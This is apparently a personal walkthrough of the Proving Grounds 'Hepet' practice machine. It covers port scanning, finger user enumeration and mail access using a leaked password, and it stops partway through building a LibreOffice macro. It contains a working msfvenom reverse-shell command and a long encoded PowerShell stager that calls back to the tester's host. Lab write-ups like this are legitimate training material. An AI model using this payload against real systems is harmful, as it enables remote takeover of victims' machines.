Hepet

Do over the weekend

Proving Grounds Practice — Hepet WalkthroughMedium

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.235.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 00:22 EDT
Nmap scan report for 192.168.235.140
Host is up (0.010s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT      STATE SERVICE        VERSION
25/tcp    open  smtp           Mercury/32 smtpd (Mail server account Maiser)
| smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME, SIZE 0, HELP
|_ Recognized SMTP commands are: HELO EHLO MAIL RCPT DATA RSET AUTH NOOP QUIT HELP VRFY SOML Mail server account is 'Maiser'.
79/tcp    open  finger         Mercury/32 fingerd
| finger: Login: Admin         Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp   open  ph-addressbook Mercury/32 PH addressbook server
106/tcp   open  pop3pw         Mercury/32 poppass service
110/tcp   open  pop3           Mercury/32 pop3d
|_pop3-capabilities: UIDL TOP APOP USER EXPIRE(NEVER)
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
143/tcp   open  imap           Mercury/32 imapd 4.62
|_imap-capabilities: OK complete AUTH=PLAIN IMAP4rev1 X-MERCURY-1A0001 CAPABILITY
443/tcp   open  ssl/http       Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Time Travel Company Page
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
445/tcp   open  microsoft-ds?
2224/tcp  open  http           Mercury/32 httpd
|_http-title: Mercury HTTP Services
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8000/tcp  open  http           Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: Time Travel Company Page
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-open-proxy: Proxy might be redirecting requests
11100/tcp open  vnc            VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    Unknown security type (40)
20001/tcp open  ftp            FileZilla ftpd 0.9.41 beta
|_ftp-bounce: bounce working!
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp            312 Oct 20  2020 .babelrc
| -r--r--r-- 1 ftp ftp            147 Oct 20  2020 .editorconfig
| -r--r--r-- 1 ftp ftp             23 Oct 20  2020 .eslintignore
| -r--r--r-- 1 ftp ftp            779 Oct 20  2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp            167 Oct 20  2020 .gitignore
| -r--r--r-- 1 ftp ftp            228 Oct 20  2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp            346 Oct 20  2020 .tern-project
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 build
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 config
| -r--r--r-- 1 ftp ftp           1376 Oct 20  2020 index.html
| -r--r--r-- 1 ftp ftp         425010 Oct 20  2020 package-lock.json
| -r--r--r-- 1 ftp ftp           2454 Oct 20  2020 package.json
| -r--r--r-- 1 ftp ftp           1100 Oct 20  2020 README.md
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 src
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 static
|_-r--r--r-- 1 ftp ftp            127 Oct 20  2020 _redirects
33006/tcp open  unknown
| fingerprint-strings: 
|   LDAPBindReq, NULL, NotesRPC, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, WMSRequest, giop, ms-sql-s: 
|_    Host '192.168.45.200' is not allowed to connect to this MariaDB server
49664/tcp open  msrpc          Microsoft Windows RPC
49665/tcp open  msrpc          Microsoft Windows RPC
49666/tcp open  msrpc          Microsoft Windows RPC
49667/tcp open  msrpc          Microsoft Windows RPC
49668/tcp open  msrpc          Microsoft Windows RPC
49669/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33006-TCP:V=7.94SVN%I=7%D=6/19%Time=66725CFF%P=x86_64-pc-linux-gnu%
SF:r(NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSe
SF:ssionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TLS
SF:SessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(S
SF:MBProgNeg,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LD
SF:APBindReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Te
SF:rminalServer,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(NotesRPC,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WM
SF:SRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(ms-
SF:sql-s,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,4
SF:D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.200'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Host: localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-19T04:25:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.04 seconds

Initial Access

Port 20001

We will first download everything using wget.

wget -m ftp://anonymous:anonymous@192.168.235.140:20001

Upon inspection, there does not look like there is anything special.

Port 79

79 - Pentesting Finger - HackTricksbook.hacktricks.xyz

There is a way to enumerate for username through this port.

finger-user-enumpentestmonkey

Since we do not want accounts that does not exists, so we will use this command instead.

$ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.235.140 | grep Login
admin@192.168.235.140: Login: admin         Name: Mail System Administrator..
agnes@192.168.235.140: Login: agnes         Name: Agnes....[No profile information]..
charlotte@192.168.235.140: Login: charlotte         Name: Charlotte....[No profile information]..
jonas@192.168.235.140: Login: jonas         Name: Jonas....[No profile information]..
magnus@192.168.235.140: Login: magnus         Name: Magnus..
martha@192.168.235.140: Login: martha         Name: Martha....[No profile information]..

So now we can see that there is 6 users that is enumerated.

admin
agnes
charlotte
jonas
magnus
martha

Port 8000

There is a website that is running on port 8000.

However, if we scroll all the way down, we can see something very weird for Jonas

It looks like that is a password.

We can try to test if that is an actual password.

Port 143

143,993 - Pentesting IMAP - HackTricksbook.hacktricks.xyz

We can see that is the password for jonas's email account.

After searching in the inbox, we can see that they are changing their office suite to LibreOffice. This means we are able to do macro attack on it.

Macro Attack

First, we need to create the payload.

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.200 LPORT=4444 -f hta-psh -o evil.hta                                                                                                

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7316 bytes
Saved as: evil.hta

Next, we need to split the payload so that we can put into the macro.

str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASgBaAHIAYwBtAFkAQwBBADcAVgBXACsAMgArAGIAUwB7ADEAfQBEACsAdgBWAEwALwB7ADEAfQAxAFIAWgBBAGkAVABIAHIANwBoAE4ARQA2AG4AUwBnAFoAOAA0AEoAcgBGAE4AdwBMAEYAOQBWAGsAVgBnAGcAWQAwAFgAMQBvAFgARgByADEANwAvADkANQB2AEYAawBJAGYAcQAzAFAAVgBPADYAawBxAFcAWQBYAGQAZQArADgAJwAnACsAJwAnADAAMwBNADMAaABwADUARAB7ADEAfQBNAEkAMgBGADkAcQBBAG4AZgAzADcAOABUADgAagBXAHkAWQB7ADAAfQBzAFUAcABGAEkAYwBsAG8AVQBTAC8AUwBZAC8AbgA1AFMAMgBhADYATgBuAEMAbAA4AEUAYQBhAEcAcwAxADIAMABhADIAagBoAGEAWABsADIAMQAwAGoAaABHAEUAVAB1ACsAVgAzAHEASQBLAFUAbQBDAHcAZwBlAEMAVQBTAEwASgAnACcAKwAnACcAdwBsAC8AQwBOAEUAQQB4AE8AcgB0ADkAZQBFAFEATwBFADcANABMAHAAYQArAFYASABxAEUAUABOAHMAbgAnACcAKwAnACcARgA5AGkAMwBiAEMAWgB7ADEAfQB3AHAAawBRAHUAUAB4AHQAUwB4ACsAWgBoAFYAWQB3ADEAdwBVAHcAUwAnACcAKwAnACcALwAvAHgAVABsAHsAMQB9AGQAbgA5AFcAVwBsADgAeQAyADEAUwBTAEsASgB4AGoANQBoAEsASwB5ADQAaABJAGkAeQA4AEUAUABtAEQAdQAvADIAYQB5AFMASgBPAG4AWgBpAG0AbABDAFAAVgBhAFkANABPAG0AOQBVAHsAMAB9ACcAJwArACcAJwBDAGkAeABQAFgAUQAnACcAKwAnACcARAAxAGoAWgBJAFIAeQB5ACcAJwArACcAJwBnAGIAaQBMAEMAYgBaADcAdgBFAHkATwBXAHgAbABGACsATABXADcAbgBLAEMAVwBKADgARABpAEsAcQBhAE8ANABiAG8AJwAnACsAJwAnAHkAUwBSAEMAdwBMAEMAKwA1AGgAcwBWAHsAMAB9ACsASQBTADEAeQA5ADUATQAwAFkAagBoAEUARgBTADEAaQBLAEsAWgByAEEAOABVAGIANwBLAEMAawAwAHIAYwBqAGwANgBBAEoAOABwAGEAZwBaAGIAQQBZAFIALwA1AFMAbABrAEYAcwBRADEAZABJAEsAawBVAHAASQBXAFgAaAB2ADUAaQBSAGIAdABDADIAQQBPADkAWABsAGEAUwBYAFMAaQBBADEAWQByAEYAYwBoAHAAUwBlAHUAcQBoAE8AMwBaAFMAZwBvADYAcAA0AEkAbABMAGcAZwBRAHsAMAB9AHIAeQBBAFcAQQA3AHcAZABIADAAQwB1ADQAOAA3AGgAcQB0AGsANgBRADUAMwBtAGoAVwBJAHYAcwB7ADEAfQBFAEgAQQAwAG8AZwBtAE8ARgBQACsASQB0AFQASwBnAGcANgBlAGIAVQBiAGoAUABiAHkAVwA3AHUASQBVAHkAYwBzAG4AdQBJAFgAUwA2AHIANwA4AHEANwBiAHEAaABTAEsAbwBiAFQANwBlAEUAUQBmADIARgBoAGIARgA3AHYATABaAHcAcQB2ADAAbAA5AHcANgBGADMAbQBiAHkAbQAzAGsANABRAGkAMQA5ADUARQBkAFkAcQBkAGcAcQAzAFEAcQBJACcAJwArACcAJwBjAGcAagBLAEEATwBrAFUAbwBqAGQAUQBJAEMAUwBtAHsAMQB9ADgAZwB0ADQAMABJADgAbQAzAEcARQBlAGEAOAArAEUAbQB0AEUAMgBMACcAJwArACcAJwAyAHAASwB1AG0AbQBMAGcAbwBWAGgAeABJAGEAZwBKAFIAUQBiADcAbAAxADgARQBjAGsAeQBhAEoAVwBxAFMAagBFAEwAQQA3AHYAZwBOAFIAUwB4ADcAVQBDAEMAcQBrADgANwByAFkARgA5ADcANQBPAHcAaQBKAEwAVwBJAG4AUwBWAGsAWQBwAFYAQwBrAFQAbABrAHcAawBFADIAUQBXAHgAYQBVAEsATQBIADUAawBaAEkAeQBtAGoAMgBLAHsAMAB9ACsASABxAEsAVwBIAFkAcwBSAE4AVwBtAEYAdgBLAHIAOABEAE0AbgBiAFoAbwBsAEwAQQA0AGQAUwBDAG4AQQBNAEMAZAAnACcAKwAnACcAcwBVAFkATwB0AGcAbgBIAG8AeQB7ADAAfQAwAHMAWQB2AFUAdgBZAEgAOQB3AHIAbAA0AEUAbwAyAFcAVABRAGcAVQBEAGwAagBhAFEARABaAGcAaAA2AE4AZwBNAE0ANgBVAEcATwBJAEUAVgBzAGcAVgBBAHsAMAB9AEUAdABYAHsAMQB9AE0AVQBnAGsAVABXAE0ATAByAEUAOQBxAEUAOQA1AE0AVwBSAEUAYwB2ADIAawBTAHUAZQBEAEwASQBvAGcAQwBQAGIATwBTAFkARgBHAEMAOQBDAGgARQBRAGIAaABMAEsAeQBZAE8ARwBZAFEAZgBQAGgAKwBHAGIATQArAGgAOABoAC8ATgB4ADEASQBKACcAJwArACcAJwBaAFcAagBQAEsAcwBTAEUAVgBsAEwAZABRADkANAA5AFEAdgAwAGEALwBwAFIANQAnACcAKwAnACcAWAB7ADAAfQBNADQAYwBuAEEAeQBOAG0AQQBFAFEAMwBwAHEARgBxAEoAKwBoAFQAOAA5AGgAZgAnACcAKwAnACcAcABBAC8AVgBXADkAeABTAFkATQAyADAAaQBPAGkATwB1AHMASgAxAFoAWQB2AHIAbQBnADQALwBFADUAOQByACcAJwArACcAJwB0AEgAMwBoAFgAZwA4AGUAKwA5AFcANAB2AFEAcwA4AFIAVQBzADAAdgBUADkAcQBqAC8AdgA5ADUAbQBaAGcAVwBFADEAbQBkAEQAUgAyAFAAZABLAFkAMwByAGwALwBmAEQAUwBVAC8AcwBTAGMAcwBiAG0AbQA5AE8AOQB3AGIAVABWAHIASAB0AFkARABmAEQAQwBHAGkAagB2AGIAVgBUADgAZAAxAE0ATwAyAHAAdQA0AE8AagA3ADcAcgB7ADAAfQBkAHEAZQA1ADEAOQA0AHgAcQBUACsAcwBZAHUASAAwADkAWgBZAHIAVABYAHMAWQBiAHUAVABEAHEAZgBxAFYAcQAwADEAawB3ADcAZQA5AHMAZgBZAEgASwA4AEcAWABmAFkAJwAnACsAJwAnAHcAcwA0AGgAdABlAGwAWAAvAHYAbgA1AHAANAA5ADAAdwBmAHIAVABxAFYARAA5AG8AaQB0AEkATAB7ADAAfQBwADMARAB3AEwATgA2AGcAZQA3AHUAWgAvADMAcQA1AGIAUwA1AFUAagBxAEsAMABvAG8ANgBWAGwAZQBsADEAewAwAH0ATQAxAFYAawBaAFYAeQArAHkAcQBZADcATwBqAGoAcwBlAHcAOQA4AG0AdgBlAGsAMwBZAEkAdwAzAGEAdABmAFUAVwBIAFQAbwB7ADEAfQBWAFgAeABsAGMAcQA5AEYAbwBSADIAbwBVADYAdQB7ADEAfQA1ACsAdgA3AFMAUQBDADIAdQBoAEMAQwBYAHEAMAAxAE4AUgBmAHQANgBPAGYAaABGAEYAdQBiAHEAbQBYADMAYgB0AGgAYwBhAFEAMgBhAGQAZgBmAGUATwB2AFEAYgBkAGoAQwBZAFcAKwBuAHcAYwBwADYANABuAFUARgA3AHEAeQBxAHsAMAB9AGUAbQBlAGcAdABuAHQASwBaADIASwBhADMAZgBuAFUAVwBzADIAbgBkADIAUQArAE4AZQB0AHsAMAB9AGkAcAB4AHQATgBRAEEAYgBHAEsAbQAzADEAdQBxAGgAcQB2AGQAOABMAGQAagBWAGYAZgB7ADEAfQAxAGsAZABrAFAAYwBVAGcAZQBHAG0ANwAxADAAdgB5AHMAUgB0AHQAcgBmADcAVAB4ADMAZgBIADAAWQByAEsANwAyAFQAOAAwAHEARwBKAFcAcQA5AFkASAB5AFAAYgBDAHgAewAxAH0ARQA3AGIAeQB4AEwALwBnADEAdgBoAE8ALwBmAGwAYQBLAHYATAA5AEwAOQBWAG8ALwBYADcAVABnAEoAYgBBAEkAMABnAE4ANQBkAEYARwBLAFgAeAB0ADIAOABJADQAOABvADUAaABxAFMAeABLAGYANgBDAHMAVQAnACcAKwAnACcAUgBJAGoAQQBLAFkAVgBnAFcASgBGAFkASQBvAFEANgBmAHsAMQB9AGwAbgByAGgAawBsADAAbgBBADkAOABYAEoAbABhAEYAdABHAHAASgAxAGwANABFAHAAUwBmAGgAMABTAHgAZABYAFUAMQBoAHkARAA1AGkATwBDAGsAcgBRAHgAUgA1AEwATwBnAFgATgB1AGQAMQAyAHIAUQA0AFcAdQA3AFcAagBPAHIAZwBGACsALwBXADQAdQB1ADkAOQBMAFIAVwBwAGsAUABDAGMARABtAHkAVAByAEoAcgBJAE4AewAxAH0ANwBBAG0AUwA5AE4AdgB4AGcAZwA4AHsAMQB9AHsAMQB9AG0AMwBwAGIAYwBUAGUAQQBnADkAYwByADYAQwBUAFEARgBzADcARgBqAGkASABVAEsAVwBVAHYAQQBRAHcAdQA5AGMAVABFADEANgBoAHsAMQB9ADcARAAnACcAKwAnACcAVgA0AGUAWQBMAC8AZwAwAEEASABBAEgAMQAnACcAKwAnACcATQAvAFIATgBLAEQARQArAEkAVgA5AE8AMwBGAEkAWQAvAGwAYgBhADUARAAwAHEAZwBEAC8AMwAzADIAagB7ADAAfQB2AFAAYwBQAHAANwA5AEUAcABWAHEAWgBRAC8AUABUADUAdQB1AE4ARgA1ADMAOQA5ADkAMQAvAGEAbQBNAEcAZwBnAFkAMABXAG8ASwBPAFkALwA4ADAARABIAG0AaAB2AEUAaAB1AEcARQBJAE4AZQBQAG4AaQBYADgASwAzAEsAVAB1ADcAZwBlACsAcQByAE4AZgAvAEQAVAAzAEUAMABRAEcAQQBDAHcAQQBBACcAJwApAC0AZgAnACcAegAnACcALAAnACcAQgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA=="

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASgBaAHIAYwB"
Str = Str + "tAFkAQwBBADcAVgBXACsAMgArAGIAUwB7ADEAfQBEACsAdgBWA"
Str = Str + "EwALwB7ADEAfQAxAFIAWgBBAGkAVABIAHIANwBoAE4ARQA2AG4"
Str = Str + "AUwBnAFoAOAA0AEoAcgBGAE4AdwBMAEYAOQBWAGsAVgBnAGcAW"
Str = Str + "QAwAFgAMQBvAFgARgByADEANwAvADkANQB2AEYAawBJAGYAcQA"
Str = Str + "zAFAAVgBPADYAawBxAFcAWQBYAGQAZQArADgAJwAnACsAJwAnA"
Str = Str + "DAAMwBNADMAaABwADUARAB7ADEAfQBNAEkAMgBGADkAcQBBAG4"
Str = Str + "AZgAzADcAOABUADgAagBXAHkAWQB7ADAAfQBzAFUAcABGAEkAY"
Str = Str + "wBsAG8AVQBTAC8AUwBZAC8AbgA1AFMAMgBhADYATgBuAEMAbAA"
Str = Str + "4AEUAYQBhAEcAcwAxADIAMABhADIAagBoAGEAWABsADIAMQAwA"
Str = Str + "GoAaABHAEUAVAB1ACsAVgAzAHEASQBLAFUAbQBDAHcAZwBlAEM"
Str = Str + "AVQBTAEwASgAnACcAKwAnACcAdwBsAC8AQwBOAEUAQQB4AE8Ac"
Str = Str + "gB0ADkAZQBFAFEATwBFADcANABMAHAAYQArAFYASABxAEUAUAB"
Str = Str + "OAHMAbgAnACcAKwAnACcARgA5AGkAMwBiAEMAWgB7ADEAfQB3A"
Str = Str + "HAAawBRAHUAUAB4AHQAUwB4ACsAWgBoAFYAWQB3ADEAdwBVAHc"
Str = Str + "AUwAnACcAKwAnACcALwAvAHgAVABsAHsAMQB9AGQAbgA5AFcAV"
Str = Str + "wBsADgAeQAyADEAUwBTAEsASgB4AGoANQBoAEsASwB5ADQAaAB"
Str = Str + "JAGkAeQA4AEUAUABtAEQAdQAvADIAYQB5AFMASgBPAG4AWgBpA"
Str = Str + "G0AbABDAFAAVgBhAFkANABPAG0AOQBVAHsAMAB9ACcAJwArACc"
Str = Str + "AJwBDAGkAeABQAFgAUQAnACcAKwAnACcARAAxAGoAWgBJAFIAe"
Str = Str + "QB5ACcAJwArACcAJwBnAGIAaQBMAEMAYgBaADcAdgBFAHkATwB"
Str = Str + "XAHgAbABGACsATABXADcAbgBLAEMAVwBKADgARABpAEsAcQBhA"
Str = Str + "E8ANABiAG8AJwAnACsAJwAnAHkAUwBSAEMAdwBMAEMAKwA1AGg"
Str = Str + "AcwBWAHsAMAB9ACsASQBTADEAeQA5ADUATQAwAFkAagBoAEUAR"
Str = Str + "gBTADEAaQBLAEsAWgByAEEAOABVAGIANwBLAEMAawAwAHIAYwB"
Str = Str + "qAGwANgBBAEoAOABwAGEAZwBaAGIAQQBZAFIALwA1AFMAbABrA"
Str = Str + "EYAcwBRADEAZABJAEsAawBVAHAASQBXAFgAaAB2ADUAaQBSAGI"
Str = Str + "AdABDADIAQQBPADkAWABsAGEAUwBYAFMAaQBBADEAWQByAEYAY"
Str = Str + "wBoAHAAUwBlAHUAcQBoAE8AMwBaAFMAZwBvADYAcAA0AEkAbAB"
Str = Str + "MAGcAZwBRAHsAMAB9AHIAeQBBAFcAQQA3AHcAZABIADAAQwB1A"
Str = Str + "DQAOAA3AGgAcQB0AGsANgBRADUAMwBtAGoAVwBJAHYAcwB7ADE"
Str = Str + "AfQBFAEgAQQAwAG8AZwBtAE8ARgBQACsASQB0AFQASwBnAGcAN"
Str = Str + "gBlAGIAVQBiAGoAUABiAHkAVwA3AHUASQBVAHkAYwBzAG4AdQB"
Str = Str + "JAFgAUwA2AHIANwA4AHEANwBiAHEAaABTAEsAbwBiAFQANwBlA"
Str = Str + "EUAUQBmADIARgBoAGIARgA3AHYATABaAHcAcQB2ADAAbAA5AHc"
Str = Str + "ANgBGADMAbQBiAHkAbQAzAGsANABRAGkAMQA5ADUARQBkAFkAc"
Str = Str + "QBkAGcAcQAzAFEAcQBJACcAJwArACcAJwBjAGcAagBLAEEATwB"
Str = Str + "rAFUAbwBqAGQAUQBJAEMAUwBtAHsAMQB9ADgAZwB0ADQAMABJA"
Str = Str + "DgAbQAzAEcARQBlAGEAOAArAEUAbQB0AEUAMgBMACcAJwArACc"
Str = Str + "AJwAyAHAASwB1AG0AbQBMAGcAbwBWAGgAeABJAGEAZwBKAFIAU"
Str = Str + "QBiADcAbAAxADgARQBjAGsAeQBhAEoAVwBxAFMAagBFAEwAQQA"
Str = Str + "3AHYAZwBOAFIAUwB4ADcAVQBDAEMAcQBrADgANwByAFkARgA5A"
Str = Str + "DcANQBPAHcAaQBKAEwAVwBJAG4AUwBWAGsAWQBwAFYAQwBrAFQ"
Str = Str + "AbABrAHcAawBFADIAUQBXAHgAYQBVAEsATQBIADUAawBaAEkAe"
Str = Str + "QBtAGoAMgBLAHsAMAB9ACsASABxAEsAVwBIAFkAcwBSAE4AVwB"
Str = Str + "tAEYAdgBLAHIAOABEAE0AbgBiAFoAbwBsAEwAQQA0AGQAUwBDA"
Str = Str + "G4AQQBNAEMAZAAnACcAKwAnACcAcwBVAFkATwB0AGcAbgBIAG8"
Str = Str + "AeQB7ADAAfQAwAHMAWQB2AFUAdgBZAEgAOQB3AHIAbAA0AEUAb"
Str = Str + "wAyAFcAVABRAGcAVQBEAGwAagBhAFEARABaAGcAaAA2AE4AZwB"
Str = Str + "NAE0ANgBVAEcATwBJAEUAVgBzAGcAVgBBAHsAMAB9AEUAdABYA"
Str = Str + "HsAMQB9AE0AVQBnAGsAVABXAE0ATAByAEUAOQBxAEUAOQA1AE0"
Str = Str + "AVwBSAEUAYwB2ADIAawBTAHUAZQBEAEwASQBvAGcAQwBQAGIAT"
Str = Str + "wBTAFkARgBHAEMAOQBDAGgARQBRAGIAaABMAEsAeQBZAE8ARwB"
